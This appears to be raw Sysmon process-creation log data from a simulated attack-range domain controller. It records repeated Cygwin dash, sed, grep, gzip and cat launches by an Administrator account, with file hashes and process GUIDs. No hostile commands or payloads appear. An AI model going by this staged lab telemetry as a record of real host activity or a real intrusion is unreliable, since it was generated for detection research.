14:55:55.234{A8622C2F-53FB-6078-E008-00000000AE01}4344C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048048Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:55.225{A8622C2F-53FB-6078-DF08-00000000AE01}5776C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FB-6078-DD08-00000000AE01}5184C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048030Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.218{A8622C2F-53FB-6078-DE08-00000000AE01}1392C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FB-6078-DB08-00000000AE01}1844C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048028Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.218{A8622C2F-53FB-6078-DD08-00000000AE01}5184C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048010Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:55.211{A8622C2F-53FB-6078-DC08-00000000AE01}4788C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FB-6078-DA08-00000000AE01}6196C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048008Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.211{A8622C2F-53FB-6078-DB08-00000000AE01}1844C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047996Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.204{A8622C2F-53FB-6078-DA08-00000000AE01}6196C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047983Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:55.195{A8622C2F-53FB-6078-D908-00000000AE01}5344C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FB-6078-D808-00000000AE01}4336C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047973Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.188{A8622C2F-53FB-6078-D808-00000000AE01}4336C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047961Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.180{A8622C2F-53FB-6078-D708-00000000AE01}924C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FB-6078-D508-00000000AE01}3368C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047943Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:55.172{A8622C2F-53FB-6078-D608-00000000AE01}7016C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FB-6078-D308-00000000AE01}7140C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047941Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.172{A8622C2F-53FB-6078-D508-00000000AE01}3368C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047923Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.165{A8622C2F-53FB-6078-D408-00000000AE01}5804C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FB-6078-D208-00000000AE01}2112C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047921Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:55.165{A8622C2F-53FB-6078-D308-00000000AE01}7140C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047909Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.158{A8622C2F-53FB-6078-D208-00000000AE01}2112C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047896Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.150{A8622C2F-53FB-6078-D108-00000000AE01}5108C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FB-6078-D008-00000000AE01}5052C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047886Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:55.143{A8622C2F-53FB-6078-D008-00000000AE01}5052C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047874Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.134{A8622C2F-53FB-6078-CF08-00000000AE01}4424C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FB-6078-CD08-00000000AE01}4568C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047856Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.127{A8622C2F-53FB-6078-CE08-00000000AE01}6440C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FB-6078-CB08-00000000AE01}3176C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047854Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:55.127{A8622C2F-53FB-6078-CD08-00000000AE01}4568C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047835Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.119{A8622C2F-53FB-6078-CC08-00000000AE01}6448C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FB-6078-CA08-00000000AE01}5776C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047834Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.119{A8622C2F-53FB-6078-CB08-00000000AE01}3176C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047822Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:55.112{A8622C2F-53FB-6078-CA08-00000000AE01}5776C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047809Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.104{A8622C2F-53FB-6078-C908-00000000AE01}6968C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FB-6078-C808-00000000AE01}6884C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047799Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.097{A8622C2F-53FB-6078-C808-00000000AE01}6884C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047787Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:55.088{A8622C2F-53FB-6078-C708-00000000AE01}6196C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FB-6078-C508-00000000AE01}5864C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047769Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.081{A8622C2F-53FB-6078-C608-00000000AE01}5344C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FB-6078-C308-00000000AE01}5224C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047767Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.081{A8622C2F-53FB-6078-C508-00000000AE01}5864C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047747Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:55.073{A8622C2F-53FB-6078-C408-00000000AE01}924C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FB-6078-C208-00000000AE01}6672C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047746Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.073{A8622C2F-53FB-6078-C308-00000000AE01}5224C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047734Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.065{A8622C2F-53FB-6078-C208-00000000AE01}6672C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047722Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:55.057{A8622C2F-53FB-6078-C108-00000000AE01}2408C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FB-6078-C008-00000000AE01}4288C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047712Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.050{A8622C2F-53FB-6078-C008-00000000AE01}4288C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047699Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.042{A8622C2F-53FB-6078-BF08-00000000AE01}2112C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FB-6078-BD08-00000000AE01}5084C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047681Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:55.034{A8622C2F-53FB-6078-BE08-00000000AE01}1140C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FB-6078-BB08-00000000AE01}6808C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047679Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.034{A8622C2F-53FB-6078-BD08-00000000AE01}5084C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047660Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.027{A8622C2F-53FB-6078-BC08-00000000AE01}4424C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FB-6078-BA08-00000000AE01}5852C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047659Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:55.027{A8622C2F-53FB-6078-BB08-00000000AE01}6808C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047647Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.020{A8622C2F-53FB-6078-BA08-00000000AE01}5852C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047634Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.012{A8622C2F-53FB-6078-B908-00000000AE01}4604C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FB-6078-B808-00000000AE01}5628C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047624Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:55.005{A8622C2F-53FB-6078-B808-00000000AE01}5628C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047612Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.996{A8622C2F-53FA-6078-B708-00000000AE01}1392C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FA-6078-B508-00000000AE01}3156C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047594Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 